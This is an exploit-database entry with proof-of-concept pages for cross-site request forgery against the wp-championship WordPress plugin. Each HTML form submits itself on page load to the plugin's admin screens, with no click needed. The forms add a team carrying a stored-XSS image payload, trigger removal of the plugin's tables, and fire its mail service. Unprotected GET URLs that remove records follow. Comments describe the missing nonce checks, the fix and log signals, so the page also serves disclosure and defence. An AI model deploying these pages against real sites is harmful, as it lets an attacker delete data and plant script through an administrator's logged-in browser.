## https://sploitus.com/exploit?id=WPEX-ID:02D25736-C796-49BD-B774-66E0E3FCF4C9
<!--
  Cross-site request forgery (CSRF) test page for the wp-championship "add team"
  admin screen (page=wp-championship/cs_admin_team.php, action=addteam).

  What the markup shows:
  * The form is posted from a foreign page straight to wp-admin/admin.php and
    contains no nonce field (nothing like _wpnonce). If the plugin accepts the
    request, its handler is not verifying a nonce.
  * team_name carries an HTML marker (an image tag with an onerror alert). If the
    alert runs when the team list is displayed, the value was stored and echoed
    without escaping.

  Plugin-side fix, for whoever maintains the handler (not visible on this page):
  emit wp_nonce_field() in the admin form, reject the request unless
  check_admin_referer() / wp_verify_nonce() passes and current_user_can()
  confirms the capability, sanitise the fields on input (sanitize_text_field())
  and escape them on output (esc_html() / esc_attr()).

  Detection: admin POSTs to this page whose Origin or Referer header is not the
  site itself are worth logging and alerting on.
-->
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin_team.php#" method="POST">
    <!-- Selects the "add team" branch of the handler. -->
    <input type="text" name="action" value="addteam">
    <!-- Marker payload: proves missing output escaping only if the alert later fires in the admin UI. -->
    <input type="text" name="team_name" value="<img src=x onerror=alert(/XSS/)>">
    <input type="text" name="team_shortname" value="test">
    <input type="text" name="team_icon" value="b">
    <input type="text" name="group" value="A">
    <input type="text" name="qualified" value="0">
    <input type="text" name="penalty" value="0">
    <!-- Mirrors the real submit button (German label: "Add team"). Because this control is
         named and id'd "submit", it shadows the form's own submit() method. -->
    <input type="hidden" id="submit" name="submit" value="Mannschaft hinzufügen »">
</form>
<script>
// form.submit would resolve to the <input name="submit"> element above, so the
// native method is taken from HTMLFormElement.prototype and called on the form.
// The call runs as soon as the page is parsed: the POST goes out with whatever
// cookies the visiting browser attaches to a cross-site request, without any click.
HTMLFormElement.prototype.submit.call(
    document.getElementById("test")
);
</script>


https://example.com/wp-admin/admin-ajax.php?action=wpc_export&dlmode=true&exmode=team&fnmode=false


<!--
  CSRF test page for the wp-championship settings screen
  (page=wp-championship/cs_admin.php, action=update).

  The fields deltables_ok=1 and deltables (German label: "Remove tables") are the
  ones that differ from a plain settings save; they presumably select the
  destructive table-removal branch (confirm against the plugin handler). The
  remaining cs_* fields resend ordinary settings values so the request looks like
  a normal form post.

  As with the other snippets on this page, there is no nonce field. The handler
  should require check_admin_referer() / wp_verify_nonce() and a
  current_user_can() capability check before touching settings or tables.

  The id "test" is reused by every snippet on this page, so each one is meant to
  be loaded as its own document; combined in one file, getElementById("test")
  would only ever return the first form.
-->
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <!-- Confirmation flag plus button value for the table-removal action. -->
    <input type="text" name="deltables_ok" value="1">
    <input type="text" name="deltables" value="Tabellen entfernen »">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    // No control in this form is named "submit", so the plain method call works.
    // It fires on page load, i.e. without any interaction from the visitor.
    document.getElementById("test").submit();
</script>


<!--
  CSRF test page for the same wp-championship settings screen
  (page=wp-championship/cs_admin.php, action=update), this time with
  mailservice_ok=1 and mailservice1 (German label: "Trigger mail service").
  Those two fields presumably make the handler send the plugin's notification
  mails (confirm against the plugin handler); the remaining cs_* fields resend
  ordinary settings values.

  No nonce field is present. The handler should require check_admin_referer() /
  wp_verify_nonce() and a current_user_can() capability check before acting.
  Unexpected bursts of plugin mail, or admin POSTs to this page with a foreign
  Origin / Referer header, are the signals to look for in logs.
-->
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <!-- Confirmation flag plus button value for the mail-service action. -->
    <input type="text" name="mailservice_ok" value="1">
    <input type="text" name="mailservice1" value="Mailservice auslösen »">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    // Submits on page load; no control here is named "submit", so the form's
    // own method is reachable directly.
    document.getElementById("test").submit();
</script>


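State-changing GET requests (action=remove with a `tid` / `mid` record id). Neither URL carries a nonce parameter; the handler should require one and accept the action only via POST:
https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_team.php&action=remove&tid=1
https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_finals.php&action=remove&mid=1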